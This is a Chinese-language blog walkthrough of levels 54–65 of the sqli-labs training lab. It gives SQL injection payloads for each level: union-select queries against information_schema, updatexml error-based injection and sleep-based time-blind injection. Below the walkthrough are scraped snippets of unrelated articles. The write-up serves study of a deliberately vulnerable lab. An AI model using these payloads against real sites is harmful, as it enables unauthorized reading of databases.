Less_54

Less-54:使用’’包裹

对输入的次数做了限制,必须在10次请求之内获取信息,否则会刷新表名

输入:?Id=1’ order by 3--+   查看有多少列;

输入 ?id=-1' union select 1,2,3 --+ 查看回显位置;

输入  ?id=-1'union select 1,2, group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES' --+  查看表名;

下面操作和less1基本一致。

Less_55

Less55: 使用()包裹 

  对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

 

Less_56

Less56:使用('’)包裹  

对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

Less_57

Less57:使用””包裹

对输入的次数做了限制,必须在14次请求之内获取信息,否则会刷新表名

其他操作与第54关基本一致

Less_58

Less58:使用’’包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

输入 ?id=-1' union select 1,2,3 --+   并没有显示回显的位置;

所以我们不能使用union select联合查询,我们使用报错注入;

输入 ?id=-1'andupdatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='CHALLENGES')),1) --+  查表名;

接下来步骤与less1基本一致。

Less_59

Less59:无包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

输入?id=-1 union select 1,2,3 --+  依旧没有回显位置;

所以同58关相同,使用报错注入。

Less_60

Less60:使用(“”)包裹  

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

采用报错注入与第58关基本一致

Less_61

Less61:使用((‘’))包裹

对输入的次数做了限制,必须在5次请求之内获取信息,否则会刷新表名

 采用报错注入与第58关基本一致

Less_62

Less62:使用(‘’)包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注

输入 ?id=1') and if((length(database())=1),1,sleep(5))--+  判断数据库的长度;

输入 ?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 's' ,1, sleep(5)) --+  判断数据库字母是否比s大;

less_63

Less63:使用‘’包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

less_64

Less64:使用(())包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

 

 

Less_65

Less65:使用(“”)包裹 

对输入的次数做了限制,必须在130次请求之内获取信息,否则会刷新表名

使用时间盲注其他操作与第62关基本一致。

 

 

sqli-libs(54-65关)的更多相关文章

  1. 靶场练习-Sqli-labs通关记录(1-4关)

                              0x00 实验环境 本地:Win 10 靶场:sqli-labs(共65关,每日一关) 0x02 通关记录 简介:一天一关! (1)第一关: 简单的 ...

  2. R语言入门系列1--数学狗还是做数据好了

    nanana,作为一个不合格的数学专业学生,脑袋不好使,又穷逼,只好学点儿实用的东西,希望能养活自己~~~ 不瞎哔哔,想做数据方面工作的时候在犹豫是学R还是学python,一点儿python基础都没有 ...

  3. JavaScript基础知识点

    本书目录 第一章:  JavaScript语言基础 第二章:  JavaScript内置对象第三章:  窗口window对象第四章:  文档document对象第五章:  表单form对象第六章:   ...

  4. MFS分布式文件系统

    一.MFS概述: MooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目录树 ...

  5. Linux MFS分布式文件系统介绍和安装

    MFS分布式文件系统 mooseFS(moose 驼鹿)是一款网络分布式文件系统.它把数据分散在多台服务器上,但对于用户来讲,看到的只是一个源.MFS也像其他类unix文件系统一样,包含了层级结构(目 ...

  6. 为什么hadoop中用到的序列化不是java的serilaziable接口去序列化而是使用Writable序列化框架

    继上一个模块之后,此次分析的内容是来到了Hadoop IO相关的模块了,IO系统的模块可谓是一个比较大的模块,在Hadoop Common中的io,主要包括2个大的子模块构成,1个是以Writable ...

  7. 一次修改闭源 Entity Provider 程序集以兼容新 EntityFramework 的过程

    读完本文你会知道,如何在没有源码的情况下,直接修改一个 DLL 以去除 DLL 上的强命名限制,并在该程序集上直接添加你的“友元程序集(一种特殊的 Attribute,将它应用在程序集上,使得程序集内 ...

  8. php中用GD绘制折线图

    php中用GD绘制折线图,代码如下: Class Chart{ private $image; // 定义图像 private $title; // 定义标题 private $ydata; // 定 ...

  9. Python基础三. 函数、lambda、filter、map、reduce

    一.概述 函数, 就是用一些语句组织起来实现一组特定的功能, 用来重复调用. 函数的作用及意义:最大化的重用代码和最小化的代码冗余以及对流程的分解. Python中有哪些函数: 内建的函数 第三方模块 ...

  10. 数组 Arrays类

    1.数组是一组变量集合,用来存储相同数据类型的一组数据的连续的空间. *数组名(标识符)连续空间首地址. *元素下标标明元素在数组中的位置,从0开始. *每个元素都可以通过下标来访问. *数组长度固定 ...

随机推荐

  1. 使用word时在方块中打钩

    ☑ 方法一: 第一步: 输入:2611 第二步: 选中2611 第三步: 按Alt + X Get :  ☑ 同样:用2610代替2611会得到☐ ☐2610 ☑2611 方法二 1.选择[插入]-- ...

  2. 关于springboot连接数据库失败时,系统报错 MySQL:The server time zone value 'Öйú±ê׼ʱ¼ä' is unrecognized or represents .....

    起初在遇到这个问题时,当然知道是怎么回事,但因为是新手,也不知道怎么处理... 百度了下,发现网上很多攻城狮们都是在mysql的命令行界面处理. 先输入命令:show variables like ' ...

  3. C语言-const再理解(转)

    有时候我们希望定义这样一种变量,它的值不能被改变,在整个作用域中都保持固定.例如,用一个变量来表示班级的最大人数,或者表示缓冲区的大小.为了满足这一要求,可以使用const关键字对变量加以限定: co ...

  4. python3练习100题——032

    链接:http://www.runoob.com/python/python-exercise-example32.html 题目:按相反的顺序输出列表的值. 我的代码: for i in li[:: ...

  5. appium+android测试环境安装

    1. jdk配置 一.背景 JDK已经更新到12了,但是由于很多工具仍然未及时更新,故推荐最稳定的JDK版本1.8.x: JDK需要配置通常情况下,JDK配置分为三项: JAVA_HOME:某些软件仍 ...

  6. ActiveMQ分布式事务

    一.安装ActiveMQ 1.拷贝apache-activemq-5.14.4-bin.tar.gz到Linux服务器的/opt下 2.解压缩 tar -zxvf apache-activemq-5. ...

  7. DTU DeepLearning: exercise 6

      Does batch_size have any affects in results quality? how to set the optimal batch size and number ...

  8. [转] UML中的六大关系

    UML中的六大关系 转自:https://www.cnblogs.com/hoojo/p/uml_design.html 在UML类图中,常见的有以下几种关系: 泛化(Generalization), ...

  9. python面试的100题(9)

    17.python如何实现单例模式?请写出两种实现方式? 第一种方法:使用装饰器 def singleton(cls): instances = {} def wrapper(*args, **kwa ...

  10. java的jdk和jre区别

    本文是本人随便总结的== 首先大概清楚个关系:jdk 包含 jre 包含 jvm 然后来看下,当我们配置完java运行环境的时候,是不是在java默认安装文件下发现jdk和jre两个包,然后jdk包里 ...